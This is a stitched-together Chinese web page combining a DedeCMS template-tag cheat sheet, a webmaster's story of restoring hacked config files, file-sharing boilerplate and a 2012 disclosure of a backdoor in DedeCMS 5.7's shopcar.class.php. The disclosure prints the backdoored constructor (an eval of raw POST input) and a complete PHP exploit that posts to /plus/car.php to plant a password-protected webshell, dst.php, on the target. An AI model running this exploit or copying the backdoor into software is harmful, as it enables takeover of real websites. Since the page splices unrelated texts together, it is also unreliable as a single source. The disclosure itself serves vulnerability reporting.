function='htmlspecialchars(@me)'/] " href="[field:arcurl /]">[field:title /]</a></li> {/dede:arclist}35.随机推荐调用标签:{dede:arclist type='commend' titlelen='26' orderby='rand' row='10'} <li><a title="[field:title function='htmlspecialchars(@me)'/] " href="[field:arcurl /]">[field:title /]</a></li> {/dede:arclist}36.热点文档调用标签:{dede:arclist orderby='click' titlelen='40' row='10'} <li><a title="[field:title function='htmlspecialchars(@me)'/] " href="[field:arcurl /]">[field:title /]</a></li> {/dede:arclist}37.相关文档调用标签:{dede:likeart titlelen='24' row='10'} <li><a title="[field:title function='htmlspecialchars(@me)'/] " href="[field:arcurl /]">[field:title /]</a></li> {/dede:likeart}38.调用图片链接标记:<a href="[field:arcurl/]"><img src="[field:picname/]" alt="[field:title/]" ></a><a href='[field:arcurl /]'>[field:image/]</a>39.调用文字链接标记:<a href="[field:aucurl/]" title="[field:title/]">[field:title/]</a><a title="[field:title function='htmlspecialchars(@me)'/] " href="[field:arcurl /]">[field:title /]</a>40.控制字数描述标记:[field:description function="cn_substr(@me,100)"/]...41.调用文章tags标记:{dede:tag type='current'/}42.文章关键字与描述:{dede:field name='keywords'/}{dede:field name='description' function='html2text(@me)'/}43.栏目介绍:{dede:field name='description' function='html2text(@me)'/}44.调用外部htm文件:{dede:include file='head.htm' ismake='yes'/}45.搜索文章调用标签:{dede:global name='keyword'/}的搜索结果- {dede:global name='cfg_webname'/}46.递增序列号:[field:global name=autoindex/]47.列表隔5行加一行线:{dede:list pagesize='50'}<LI><a href="[field:arcurl /]" title="[field:title function='htmlspecialchars(@me)'/]" target=_blank>[field:title function="cn_substr(@me,48)"/]</a>[field:pubdate runphp='yes']$a="<font color=red>".strftime('%m-%d',@me)."</font>";$b=strftime('%m-%d',@me);$ntime = time();$day3 = 3600 * 24;if(($ntime - @me) < $day3) @me = $a;else @me =$b;[/field:pubdate]<br>[field:global name=autoindex runphp="yes"]if(@me%5==0)@me="<hr />";else @me="";[/field:global]{/dede:list}<DIV class="line2 m1 m3"></DIV></LI>48.最新文章列表“隔行换色”的方法{dede:arclist orderby=pubdate titlelen='26' row='10'}[field:global runphp='yes' name=autoindex]$a="<div id='a'>";$b="<div id='b'>";if ((@me%2)==0) @me=$a;else @me=$b;[/field:global]<ul><li>[field:title/]</li></ul></div>{/dede:arclist}49.24小时内更新的文章时间显示为红色:[field:pubdate runphp='yes']$a="<font color=red>".strftime('%m-%d',@me)."</font>";$b=strftime('%m-%d',@me);$ntime = time();$day3 = 3600 * 24;if(($ntime - @me) < $day3) @me = $a;else @me =$b;[/field:pubdate]50.COPY页面内容,自动在后面加上网站信息,利于SEO<script type="text/javascript">document.body.oncopy = function () { setTimeout( function () { var text = clipboardData.getData("text"); if (text) { text = text + "\r\n本篇文章来源于www.地址.COM 原文链接:"+location.href; clipboardData.setData("text", text); } }, 100 ) } </script>51.按时间点击文章排行榜调用标签:按总:{dede:arclist row='24' titlelen=24 orderby=click}按月:{dede:arclist row='24' titlelen=8 orderby=click subday=30}按周:{dede:arclist row='24' titlelen=8 orderby=click subday=7}在首页调用某栏目的子栏目{dede:channel type=’sun’typeid=’栏目ID’}<a href=”[field:typelink/]“>[field:typename/]</a>{/dede:channel}或者{dede:global name=’maplist’/}52.搜索表单调用标签:<form action="{dede:global name='cfg_phpurl'/}/search.php" name="formsearch"> <input type="hidden" name="kwtype" value="1" /><input name="keyword" id="keyword" type="text" class="searchtxt" /><select name="searchtype" id="searchtype"><option value="titlekeyword" selected>智能模糊搜索</option><option value="title">仅搜索标题</option></select><input type="image" src="{dede:field name='templeturl'/}/images/topsearch_submit.gif" /></form>53.实现“文章标题-2级栏目-1级栏目-网站名”形式{dede:field name='title'/}-{dede:field name='position' runphp='yes'}$tc="-"; //分隔符$tw=$GLOBALS['cfg_list_symbol']; //调用位置分隔符@me=html2text(@me); //去除html标签$tf=split($tw,@me); //分解成数组for($ta=(count($tf)-2);$ta>=1;$ta--){ //循环赋值给$tk$tk.=trim($tf[$ta]).$tc;}$tk=substr($tk,0,-1);@me=$tk; //赋值给@me{/dede:field}-{dede:global name='cfg_webname'/}54.调用缩略图:<img src='{dede:field name="litpic"/}'>55.发布的文章显示红色日期或加上new字或new小图片给近三天(或当天)发布的文章显示红色日期或加上new字或new小图片等。
DEDE织梦CMS被黑数据清空的重要问题
DEDE织梦CMS被黑数据清空的重要
问题
昨天有一个人说我黑他的站,说数据都没有了,后台留下我的网址,我当时认为有人陷害我,于是我登陆后台,发现我的后台也登陆不上去了,使用默认用户名密码(admin)登陆成功,数据都没有了,我想这下完了,我自认平时品行端正,不会与人结仇,难道是竞争对手所为?那也不至于陷害我还黑我啊,于是查找原因,登陆网站信息,写这一个陌生网站的信息,再登陆,信息居然又换成另外一个,我马上登陆服务器到MYSQL里查看,发现数据完好,这就奇怪了,为什么数据库里的数据完好可网站后台里却是空的,而且连登陆账号都没了,我开始怀疑并非数据被清空,可能只是路径改变了,于是查看昨日修改时间,发现在在路径为/include/里的三个文件被修改过,而且还多出来一个可疑文件
三个被修改的文件分别为:
/include/config_base.php
/include/config_hand.php
/include/config_hand_bak.php
可疑文件:purview.php
我用原来的备份文件替换了这三个被修改的文件,并将可疑文件删除,用我的账号重新登陆后台成功,数据都在,终于舒了一口气。
个人觉得这个很重要,因为幸好可以用默认密码登陆,要不很难发现,相信有很多人因为看到这个马上重新安装导入数据,那样就麻烦了。
站长查询工具
文章来源于:/article-24404-1.html。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
dedecms 5.7 shopcar.class.php 被植入一句话一句话后门利用
漏洞详情
披露状态:
2012-03-20:积极联系厂商并且等待厂商认领中,细节不对外公开
2012-03-20:厂商已经主动忽略漏洞,细节向公众公开
简要描述:
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门
前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
修复方案:
删除@eval(file_get_contents('php://input')); shopcar.class.php 被植入一句话
@eval(file_get_contents('php://input'));
去官网下了一套回来,看了下代码,
classMemberShops{var $OrdersId;var $productsId;function
__construct(){ $this->OrdersId=
$this->getCookie("OrdersId");if(empty($this->OrdersId)){ $this->OrdersId= $this->MakeOrders();}@eval(file_get_contents('php://input'));}functionMemberShops(){ $this->__construct();}
shopcar.class.php 文件中只有一个MemberShops 类,构造函数里面出现了后门,当类被实例化的时候就会自动执行构造函数,程序猿你懂的。
eval 执行和file_get_contents 获取内容不用说了,php://input 这个是输入流,接收的是post 内容,但是post 类型不能为multipart/form-data
在eclipse 里搜索new MemberShops, 找到/plus/car.php 里面实例化了这个类,
require_once (dirname(__FILE__)."/../include/common.inc.php");define('_PLUS_TPL_', DEDEROOT.'/templets/plus');require_once(DEDEINC.'/dedetemplate.class.php');require_o nce DEDEINC.'/shopcar.class.php';require_once DEDEINC.'/memberlogin.class.php';$cart =newMemberShops();
开始的时候写了个简单的表单去测试,发现php://input 的内容中特殊符号会被urlencode,很奇怪吧,明明取的是post,却像get 一样被编码,既然如此,那就自己构造post 了,抓个包,用fsockopen() 函数模拟post 提交吧,exp 如下:
<?php//author:舞林//date : 2012-03-21 00:31:05//shell一句话地址,/plus/dst.php 密码cmd///dede/plus/car.phperror_reporting(E_ERROR);set_time_limit(0);$url ='www. ';//目标站url$dir ='/dede';//dedecms安装目录//$content =
'$a=${@phpinfo()};';$content ='$a=${@file_put_contents("dst.php","<?php
eval(\$_POST[cmd]); ?>")};';$data = "POST $dir/plus/car.php HTTP/1.1\r\n";$data .= "Host: localhost\r\n";$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$data .= "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$data .=
$content."\r\n";$socket=fsockopen($url,'80');if ($socket)
{ fwrite($socket,$data); while (!feof($socket))
{ $exp.=fgets($socket, 1024); } echo $exp;}else{ echo 'socket err';}?>。